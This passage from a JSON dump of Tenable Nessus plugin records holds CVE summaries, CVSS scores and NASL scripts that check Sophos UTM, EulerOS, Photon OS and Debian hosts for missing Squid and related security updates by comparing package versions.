value:\"2023/02/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:sophos:unified_threat_management\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:sophos:unified_threat_management\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Firewalls\");\n\n script_copyright(english:\"This script is Copyright (C) 2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"sophos_utm_detect.nbin\", \"sophos_utm_web_detect.nbin\");\n script_require_keys(\"installed_sw/Sophos UTM\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\nvar app_info = vcf::combined_get_app_info(app:\"Sophos UTM\");\n\nvar constraints = [\n {'fixed_version': '9.511', 'fixed_display':'9.511 MR11'}, \n {'min_version': '9.600', 'fixed_version': '9.607', 'fixed_display':'9.607 MR7'},\n {'min_version': '9.700', 'fixed_version': '9.705', 'fixed_display':'9.705 MR5'}\n];\n\nvcf::check_version_and_report(\n app_info:app_info, \n constraints:constraints, \n severity:SECURITY_HOLE\n);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:57:02", "description": "According to the versions of the squid packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :\n\n - An issue was discovered in Squid before 4.15 and 5.x before 5.0.6. Due to a buffer-management bug, it allows a denial of service. When resolving a request with the urn: scheme, the parser leaks a small amount of memory. However, there is an unspecified attack methodology that can easily trigger a large amount of memory consumption. (CVE-2021-28651)\n\n - An issue was discovered in Squid before 4.15 and 5.x before 5.0.6. Due to a memory-management bug, it is vulnerable to a Denial of Service attack (against all clients using the proxy) via HTTP Range request processing. (CVE-2021-31806)\n\n - An issue was discovered in Squid before 4.15 and 5.x before 5.0.6. An integer overflow problem allows a remote server to achieve Denial of Service when delivering responses to HTTP Range requests. The issue trigger is a header that can be expected to exist in HTTP traffic without any malicious intent.\n (CVE-2021-31807)\n\n - An issue was discovered in Squid before 4.15 and 5.x before 5.0.6. Due to an input-validation bug, it is vulnerable to a Denial of Service attack (against all clients using the proxy). A client sends an HTTP Range request to trigger this. (CVE-2021-31808)\n\n - Squid before 4.15 and 5.x before 5.0.6 allows remote servers to cause a denial of service (affecting availability to all clients) via an HTTP response. The issue trigger is a header that can be expected to exist in HTTP traffic without any malicious intent by the server. (CVE-2021-33620)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-25T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP3 : squid (EulerOS-SA-2021-2618)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28651", "CVE-2021-31806", "CVE-2021-31807", "CVE-2021-31808", "CVE-2021-33620"], "modified": "2021-10-25T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:squid", "p-cpe:/a:huawei:euleros:squid-migration-script", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2021-2618.NASL", "href": "https://www.tenable.com/plugins/nessus/154370", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154370);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/10/25\");\n\n script_cve_id(\n \"CVE-2021-28651\",\n \"CVE-2021-31806\",\n \"CVE-2021-31807\",\n \"CVE-2021-31808\",\n \"CVE-2021-33620\"\n );\n\n script_name(english:\"EulerOS 2.0 SP3 : squid (EulerOS-SA-2021-2618)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the squid packages installed, the EulerOS installation on the remote host is affected by\nthe following vulnerabilities :\n\n - An issue was discovered in Squid before 4.15 and 5.x before 5.0.6. Due to a buffer-management bug, it\n allows a denial of service. When resolving a request with the urn: scheme, the parser leaks a small amount\n of memory. However, there is an unspecified attack methodology that can easily trigger a large amount of\n memory consumption. (CVE-2021-28651)\n\n - An issue was discovered in Squid before 4.15 and 5.x before 5.0.6. Due to a memory-management bug, it is\n vulnerable to a Denial of Service attack (against all clients using the proxy) via HTTP Range request\n processing. (CVE-2021-31806)\n\n - An issue was discovered in Squid before 4.15 and 5.x before 5.0.6. An integer overflow problem allows a\n remote server to achieve Denial of Service when delivering responses to HTTP Range requests. The issue\n trigger is a header that can be expected to exist in HTTP traffic without any malicious intent.\n (CVE-2021-31807)\n\n - An issue was discovered in Squid before 4.15 and 5.x before 5.0.6. Due to an input-validation bug, it is\n vulnerable to a Denial of Service attack (against all clients using the proxy). A client sends an HTTP\n Range request to trigger this. (CVE-2021-31808)\n\n - Squid before 4.15 and 5.x before 5.0.6 allows remote servers to cause a denial of service (affecting\n availability to all clients) via an HTTP response. The issue trigger is a header that can be expected to\n exist in HTTP traffic without any malicious intent by the server. (CVE-2021-33620)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security\nadvisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional\nissues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2021-2618\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?eadd0534\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected squid packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-28651\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/05/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/10/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/10/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:squid\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:squid-migration-script\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar release = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nvar uvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP3\");\n\nvar sp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(3)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP3\");\n\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP3\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nvar flag = 0;\n\nvar pkgs = [\n \"squid-3.5.20-2.2.h14\",\n \"squid-migration-script-3.5.20-2.2.h14\"\n];\n\nforeach (var pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"3\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"squid\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-03-09T15:26:17", "description": "The Microsoft Open Management Infrastructure service detected on the remote host is affected by a remote code execution vulnerability due to insufficient authentication validation. An unauthenticated, remote attacker can exploit this to execute code on the remote host as root.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-20T00:00:00", "type": "nessus", "title": "Microsoft Open Management Infrastructure RCE (CVE-2021-38647)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2023-03-09T00:00:00", "cpe": ["x-cpe:/a:microsoft:open_management_infrastructure"], "id": "OMI_CVE-2021-38647.NBIN", "href": "https://www.tenable.com/plugins/nessus/153486", "sourceData": "Binary data omi_cve-2021-38647.nbin", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:52:31", "description": "An update of the squid package has been released.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-07-22T00:00:00", "type": "nessus", "title": "Photon OS 3.0: Squid PHSA-2021-3.0-0269", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28651", "CVE-2021-28652", "CVE-2021-31806", "CVE-2021-31807", "CVE-2021-31808", "CVE-2021-33620"], "modified": "2021-07-22T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:squid", "cpe:/o:vmware:photonos:3.0"], "id": "PHOTONOS_PHSA-2021-3_0-0269_SQUID.NASL", "href": "https://www.tenable.com/plugins/nessus/151955", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2021-3.0-0269. The text\n# itself is copyright (C) VMware, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(151955);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/07/22\");\n\n script_cve_id(\n \"CVE-2021-28651\",\n \"CVE-2021-28652\",\n \"CVE-2021-31806\",\n \"CVE-2021-31807\",\n \"CVE-2021-31808\",\n \"CVE-2021-33620\"\n );\n\n script_name(english:\"Photon OS 3.0: Squid PHSA-2021-3.0-0269\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the squid package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-3.0-269.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-28651\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/05/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/07/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/07/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:squid\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:3.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item('Host/PhotonOS/release');\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, 'PhotonOS');\nif (release !~ \"^VMware Photon (?:Linux|OS) 3\\.0(\\D|$)\") audit(AUDIT_OS_NOT, 'PhotonOS 3.0');\n\nif (!get_kb_item('Host/PhotonOS/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'PhotonOS', cpu);\n\nflag = 0;\n\nif (rpm_check(release:'PhotonOS-3.0', cpu:'x86_64', reference:'squid-4.16-1.ph3')) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'squid');\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T14:50:18", "description": "Multiple denial of service vulnerabilities were discovered in the Squid proxy caching server.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-06-03T00:00:00", "type": "nessus", "title": "Debian DSA-4924-1 : squid - security update", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28651", "CVE-2021-28652", "CVE-2021-28662", "CVE-2021-31806", "CVE-2021-31807", "CVE-2021-31808"], "modified": "2021-06-17T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:squid", "cpe:/o:debian:debian_linux:10.0"], "id": "DEBIAN_DSA-4924.NASL", "href": "https://www.tenable.com/plugins/nessus/150165", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4924. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(150165);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/06/17\");\n\n script_cve_id(\"CVE-2021-28651\", \"CVE-2021-28652\", \"CVE-2021-28662\", \"CVE-2021-31806\", \"CVE-2021-31807\", \"CVE-2021-31808\");\n script_xref(name:\"DSA\", value:\"4924\");\n\n script_name(english:\"Debian DSA-4924-1 : squid - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Multiple denial of service vulnerabilities were discovered in the\nSquid proxy caching server.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=988891\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=988892\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=988893\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=989043\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/squid\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/buster/squid\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2021/dsa-4924\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Upgrade the squid packages.\n\nFor the stable distribution (buster), these problems have been fixed\nin version 4.6-1+deb10u6.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-28651\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:squid\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:10.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/05/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"10.0\", prefix:\"squid\", reference:\"4.6-1+deb10u6\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"squid-cgi\", reference:\"4.6-1+deb10u6\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"squid-common\", reference:\"4.6-1+deb10u6\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"squid-purge\", reference:\"4.6-1+deb10u6\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"squid3\", reference:\"4.6-1+deb10u6\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"squidclient\", reference:\"4.6-1+deb10u6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T14:49:47", "description": "Several vulnerabilities were discovered in Squid, a proxy caching server. \n\nCVE-2021-28651\n\nDue to a buffer-management bug, it allows a denial of service. When resolving a request with the urn: scheme, the parser leaks a small amount of memory. However, there is an unspecified attack methodology that can easily trigger a large amount of memory consumption.\n\nCVE-2021-28652\n\nDue to incorrect parser validation, it allows a Denial of Service attack against the Cache Manager API. This allows a trusted client to trigger memory leaks that. over time, lead to a Denial of Service via an unspecified short query string. This attack is limited to clients with Cache Manager API access privilege.\n\nCVE-2021-31806\n\nDue to a memory-management bug, it is vulnerable to a Denial of Service attack (against all clients using the proxy) via HTTP Range request processing.\n\nCVE-2021-31807\n\nAn integer overflow problem allows a remote server to achieve Denial of Service when delivering responses to HTTP Range requests. The issue trigger is a header that can be expected to exist in HTTP traffic without any malicious intent.\n\nCVE-2021-31808\n\nDue to an input-validation bug, it is vulnerable to a Denial of Service attack (against all clients using the proxy). A client sends an HTTP Range request to trigger this.\n\nCVE-2021-33620\n\nRemote servers to cause a denial of service (affecting availability to all clients) via an HTTP response. The issue trigger is a header that can be expected to exist in HTTP traffic without any malicious intent by the server.\n\nFor Debian 9 stretch, these problems have been fixed in version 3.5.23-5+deb9u7.\n\nWe recommend that you upgrade your squid3 packages.\n\nFor the detailed security status of squid3 please refer to its security tracker page at:\nhttps://security-tracker.debian.org/tracker/squid3\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-06-15T00:00:00", "type": "nessus", "title": "Debian DLA-2685-1 : squid3 security update", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28651", "CVE-2021-28652", "CVE-2021-31806", "CVE-2021-31807", "CVE-2021-31808", "CVE-2021-33620"], "modified": "2023-01-05T00:00:00", "cpe": ["cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "p-cpe:2.3:a:debian:debian_linux:squid:*:*:*:*:*:*:*", "p-cpe:2.3:a:debian:debian_linux:squid-common:*:*:*:*:*:*:*", "p-cpe:2.3:a:debian:debian_linux:squid-cgi:*:*:*:*:*:*:*", "p-cpe:2.3:a:debian:debian_linux:squid3:*:*:*:*:*:*:*", "p-cpe:2.3:a:debian:debian_linux:squidclient:*:*:*:*:*:*:*", "p-cpe:2.3:a:debian:debian_linux:squid-purge:*:*:*:*:*:*:*", "p-cpe:2.3:a:debian:debian_linux:squid-dbg:*:*:*:*:*:*:*"], "id": "DEBIAN_DLA-2685.NASL", "href": "https://www.tenable.com/plugins/nessus/150796", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-2685-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(150796);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/05\");\n\n script_cve_id(\"CVE-2021-28651\", \"CVE-2021-28652\", \"CVE-2021-31806\", \"CVE-2021-31807\", \"CVE-2021-31808\", \"CVE-2021-33620\");\n\n script_name(english:\"Debian DLA-2685-1 : squid3 security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Several vulnerabilities were discovered in Squid, a proxy caching\nserver. \n\nCVE-2021-28651\n\nDue to a buffer-management bug, it allows a denial of service. When\nresolving a request with the urn: scheme, the parser leaks a small\namount of memory. However, there is an unspecified attack methodology\nthat can easily trigger a large amount of memory consumption.\n\nCVE-2021-28652\n\nDue to incorrect parser validation, it allows a Denial of Service\nattack against the Cache Manager API. This allows a trusted client to\ntrigger memory leaks that. over time, lead to a Denial of Service via\nan unspecified short query string. This attack is limited to clients\nwith Cache Manager API access privilege.\n\nCVE-2021-31806\n\nDue to a memory-management bug, it is vulnerable to a Denial of\nService attack (against all clients using the proxy) via HTTP Range\nrequest processing.\n\nCVE-2021-31807\n\nAn integer overflow problem allows a remote server to achieve Denial\nof Service when delivering responses to HTTP Range requests. The issue\ntrigger is a header that can be expected to exist in HTTP traffic\nwithout any malicious intent.\n\nCVE-2021-31808\n\nDue to an input-validation bug, it is vulnerable to a Denial of\nService attack (against all clients using the proxy). A client sends\nan HTTP Range request to trigger 